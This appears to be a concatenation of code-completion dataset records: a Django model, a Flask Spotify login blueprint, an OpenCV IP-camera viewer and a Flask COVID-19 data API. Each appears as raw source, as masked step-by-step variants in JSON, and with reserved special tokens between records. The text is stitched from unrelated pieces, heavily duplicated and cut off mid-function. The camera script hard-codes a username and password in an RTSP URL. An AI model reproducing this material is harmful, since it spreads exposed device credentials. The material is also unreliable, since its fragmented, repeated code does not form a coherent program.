skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')
offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')
<|reserved_special_token_1|>
from django.db import models
from skills.models import skill
from offres.models import Offer
# Create your models here.
class OfferRequirement(models.Model):
skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default="")
offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default="")
|
flexible
|
{
"blob_id": "3640f1df412b43b42fb4e856604508f698a208ad",
"index": 6385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass OfferRequirement(models.Model):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')\n offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')\n",
"step-4": "from django.db import models\nfrom skills.models import skill\nfrom offres.models import Offer\n\n\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING, default='')\n offer = models.ForeignKey(Offer, on_delete=models.CASCADE, default='')\n",
"step-5": "from django.db import models\nfrom skills.models import skill\nfrom offres.models import Offer \n\n# Create your models here.\nclass OfferRequirement(models.Model):\n skill = models.ForeignKey(skill, on_delete=models.DO_NOTHING ,default=\"\")\n offer = models.ForeignKey(Offer , on_delete=models.CASCADE, default=\"\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
<|reserved_special_token_0|>
config.read('spotify.cfg')
<|reserved_special_token_0|>
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bp = Blueprint('auth', __name__, url_prefix='/auth')
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,
scope=SCOPE)
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
from base64 import b64encode
from configparser import ConfigParser
import functools
from flask import Blueprint, flash, redirect, render_template, request, session, url_for, app
from requests.exceptions import SSLError
import spotipy
from spotipy import oauth2
bp = Blueprint('auth', __name__, url_prefix='/auth')
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,
scope=SCOPE)
@bp.route('/login')
def login():
"""
: Create session and login user
: PARAMS None
: RETURN <view>
"""
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash('Connection error')
@bp.route('/callback/')
def callback():
"""
: Redirect user after login
: PARAMS None
: RETURN <view>
"""
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
return redirect(url_for('home'))
else:
flash('Cannot get access token')
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
"""
: Clear session and log user out
: PARAMS None
: RETURN <view>
"""
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
<|reserved_special_token_1|>
from base64 import b64encode
from configparser import ConfigParser
import functools
from flask import (
Blueprint, flash, redirect, render_template, request, session, url_for, app
)
from requests.exceptions import SSLError
import spotipy
from spotipy import oauth2
bp = Blueprint('auth', __name__, url_prefix='/auth')
config = ConfigParser()
config.read('spotify.cfg')
CLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip("'")
CLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip("'")
REDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip("'")
SCOPE = 'user-read-currently-playing user-library-read playlist-read-private'
SP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI, scope=SCOPE)
@bp.route('/login')
def login():
'''
: Create session and login user
: PARAMS None
: RETURN <view>
'''
try:
session.clear()
return redirect(SP_OAUTH.get_authorize_url())
except ConnectionError as e:
flash("Connection error")
@bp.route('/callback/')
def callback():
'''
: Redirect user after login
: PARAMS None
: RETURN <view>
'''
code = request.args.get('code')
token = SP_OAUTH.get_access_token(code)
if token:
session['token'] = token['access_token']
session['refresh'] = token['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError as e:
# flash("Connection error")
return redirect(url_for('home'))
else:
flash("Cannot get access token")
return redirect(url_for('home'))
@bp.route('/logout')
def logout():
'''
: Clear session and log user out
: PARAMS None
: RETURN <view>
'''
session.clear()
return redirect(url_for('home'))
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if 'refresh' in session:
refresh = SP_OAUTH.refresh_access_token(session['refresh'])
session['token'] = refresh['access_token']
session['refresh'] = refresh['refresh_token']
sp = spotipy.Spotify(auth=session['token'])
try:
cu = sp.current_user()
session['display_name'] = cu['display_name']
except SSLError:
# flash("Connection error - please try again.")
return redirect(url_for('home'))
return view(**kwargs)
else:
return redirect(url_for('home'))
return wrapped_view
|
flexible
|
{
"blob_id": "8f7ecbe03e9a7a1d9df8cbe4596456e21b84653b",
"index": 9114,
"step-1": "<mask token>\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-2": "<mask token>\nconfig.read('spotify.cfg')\n<mask token>\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-3": "<mask token>\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,\n scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-4": "from base64 import b64encode\nfrom configparser import ConfigParser\nimport functools\nfrom flask import Blueprint, flash, redirect, render_template, request, session, url_for, app\nfrom requests.exceptions import SSLError\nimport spotipy\nfrom spotipy import oauth2\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI,\n scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n \"\"\"\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n \"\"\"\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash('Connection error')\n\n\n@bp.route('/callback/')\ndef callback():\n \"\"\"\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n \"\"\"\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n return redirect(url_for('home'))\n else:\n flash('Cannot get access token')\n return redirect(url_for('home'))\n\n\n@bp.route('/logout')\ndef logout():\n \"\"\"\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n \"\"\"\n session.clear()\n return redirect(url_for('home'))\n\n\ndef login_required(view):\n\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n return wrapped_view\n",
"step-5": "from base64 import b64encode\nfrom configparser import ConfigParser\nimport functools\nfrom flask import (\n Blueprint, flash, redirect, render_template, request, session, url_for, app\n)\nfrom requests.exceptions import SSLError\nimport spotipy\nfrom spotipy import oauth2\n\nbp = Blueprint('auth', __name__, url_prefix='/auth')\nconfig = ConfigParser()\nconfig.read('spotify.cfg')\nCLIENT_ID = config.get('SPOTIFY', 'CLIENT_ID').strip(\"'\")\nCLIENT_SECRET = config.get('SPOTIFY', 'CLIENT_SECRET').strip(\"'\")\nREDIRECT_URI = config.get('SPOTIFY', 'REDIRECT_URI').strip(\"'\")\nSCOPE = 'user-read-currently-playing user-library-read playlist-read-private'\nSP_OAUTH = oauth2.SpotifyOAuth(CLIENT_ID, CLIENT_SECRET, REDIRECT_URI, scope=SCOPE)\n\n\n@bp.route('/login')\ndef login():\n '''\n : Create session and login user\n : PARAMS None\n : RETURN <view>\n '''\n try:\n session.clear()\n return redirect(SP_OAUTH.get_authorize_url())\n except ConnectionError as e:\n flash(\"Connection error\")\n\n\n@bp.route('/callback/')\ndef callback():\n '''\n : Redirect user after login\n : PARAMS None\n : RETURN <view>\n '''\n code = request.args.get('code')\n token = SP_OAUTH.get_access_token(code)\n if token:\n session['token'] = token['access_token']\n session['refresh'] = token['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError as e:\n # flash(\"Connection error\")\n return redirect(url_for('home'))\n else:\n flash(\"Cannot get access token\")\n return redirect(url_for('home'))\n\n@bp.route('/logout')\ndef logout():\n '''\n : Clear session and log user out\n : PARAMS None\n : RETURN <view>\n '''\n session.clear()\n return redirect(url_for('home'))\n\ndef login_required(view):\n @functools.wraps(view)\n def wrapped_view(**kwargs):\n\n if 'refresh' in session:\n refresh = SP_OAUTH.refresh_access_token(session['refresh'])\n session['token'] = refresh['access_token']\n session['refresh'] = refresh['refresh_token']\n sp = spotipy.Spotify(auth=session['token'])\n try:\n cu = sp.current_user()\n session['display_name'] = cu['display_name']\n except SSLError:\n # flash(\"Connection error - please try again.\")\n return redirect(url_for('home'))\n return view(**kwargs)\n else:\n return redirect(url_for('home'))\n\n return wrapped_view\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""Access IP Camera in Python OpenCV"""
import cv2
#stream = cv2.VideoCapture('protocol://IP:port/1')
# Use the next line if your camera has a username and password
stream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')
while True:
r, f = stream.read()
cv2.imshow('IP Camera stream',f)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "f9db3c96bc3fd4911640d0428672c87072564b0d",
"index": 710,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-4": "<mask token>\nimport cv2\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video')\nwhile True:\n r, f = stream.read()\n cv2.imshow('IP Camera stream', f)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-5": "\"\"\"Access IP Camera in Python OpenCV\"\"\"\r\n\r\nimport cv2\r\n\r\n#stream = cv2.VideoCapture('protocol://IP:port/1')\r\n\r\n# Use the next line if your camera has a username and password\r\nstream = cv2.VideoCapture('rtsp://SeniorDesign:1Hwe2Dxy@10.9.27.28:554/video') \r\n\r\nwhile True:\r\n\r\n r, f = stream.read()\r\n cv2.imshow('IP Camera stream',f)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
<|reserved_special_token_0|>
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
def deathCases(country):
array = dataEx.getData('Deaths', country).tolist()
return jsonify({'deaths': array})
@app.route('/visualisation/maxofall/<string:country>')
@cross_origin()
def maxofall(country):
array = dataEx.getMaxOfAll(country).tolist()
return jsonify({'confirmed': array[0], 'recovered': array[1], 'death':
array[2]})
@app.route('/visualisation/newdata/<string:country>')
@cross_origin()
def NewData(country):
array = dataEx.getNewData(country)[0]
lastUpdate = dataEx.getNewData(country)[1]
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2], 'lastUpdate': lastUpdate})
@app.route('/visualisation/regionsData')
@cross_origin()
def dataByregion():
array = dataEx.getRegionsData()
return jsonify({'regions': array[0], 'affectedNum': array[1], 'update':
array[2], 'somme': array[3]})
@app.route('/visualisation/StatistiqueMonde')
@cross_origin()
def getStatistiqueMonde():
array = dataEx.getStatistiqueMonde()
return jsonify({'totalCases': array[0], 'death': array[1], 'recovered':
array[2]})
@app.route('/visualisation/clusterAge')
@cross_origin()
def getClusterAge():
array = dataEx.getDataClusterAge()
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/clusterTest')
@cross_origin()
def getClusterTest():
array = dataEx.getDataClusterTest()
print(array)
return jsonify({'countries': array[0].tolist(), 'x': array[1].tolist(),
'y': array[2].tolist(), 'cluster': array[3].tolist()})
@app.route('/visualisation/ageClusterMean')
@cross_origin()
def getMeanClusterAge():
array = dataEx.getDataClusterAge()[4]
print(array)
return jsonify({'meanClusters': array.tolist()})
@app.route('/visualisation/testClusterMean')
@cross_origin()
def getMeanClusterTest():
array = dataEx.getDataClusterTest()[4]
return jsonify({'meanClusters': array.tolist()})
@app.route('/analysesentiment/covid19/', defaults={'tags': '#covid19',
'tags2': ''})
@app.route('/analysesentiment/covid19/<string:tags>/<string:tags2>')
@cross_origin()
def analyseSentiment(tags, tags2):
array = twitterDataExtaraction(tags, tags2)
return jsonify({'neutral': array[0], 'negative': array[1], 'positive':
array[2]})
@app.route('/mongodb/nature')
@cross_origin()
def getNature():
cursor = db.nature.find().skip(db.nature.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/economy')
@cross_origin()
def getEconomy():
cursor = db.economy.find().skip(db.economy.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/mentalhealth')
@cross_origin()
def getMentalhealth():
cursor = db.mentalhealth.find().skip(db.mentalhealth.count_documents({}
) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/mongodb/politics')
@cross_origin()
def getPolitics():
cursor = db.politics.find().skip(db.politics.count_documents({}) - 1)
return jsonify({'neutral': cursor[0]['neutral'], 'negative': cursor[0][
'negative'], 'positive': cursor[0]['positive']})
@app.route('/visualisation/clusteringAge')
@cross_origin()
def getClusteringAge():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringAge.find().skip(db.clusteringAge.count_documents({
}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
@app.route('/visualisation/clusteringTest')
@cross_origin()
def getClusteringTest():
app.config['MONGO_URI'] = 'mongodb://localhost:27017/ClusteringDB'
mongo = PyMongo(app)
db = mongo.db
array = db.clusteringTest.find().skip(db.clusteringTest.count_documents
({}) - 1)
return jsonify({'countries': array[0]['countries'], 'x': array[0]['x'],
'y': array[0]['y'], 'cluster': array[0]['cluster']})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/visualisation/confirmed/<string:country>')
@cross_origin()
def confirmedCases(country):
array = dataEx.getData('Confirmed', country).tolist()
return jsonify({'confirmed': array})
@app.route('/visualisation/recovered/<string:country>')
@cross_origin()
def recoveredCases(country):
array = dataEx.getData('Recovered', country).tolist()
return jsonify({'recovered': array})
@app.route('/visualisation/death/<string:country>')
@cross_origin()
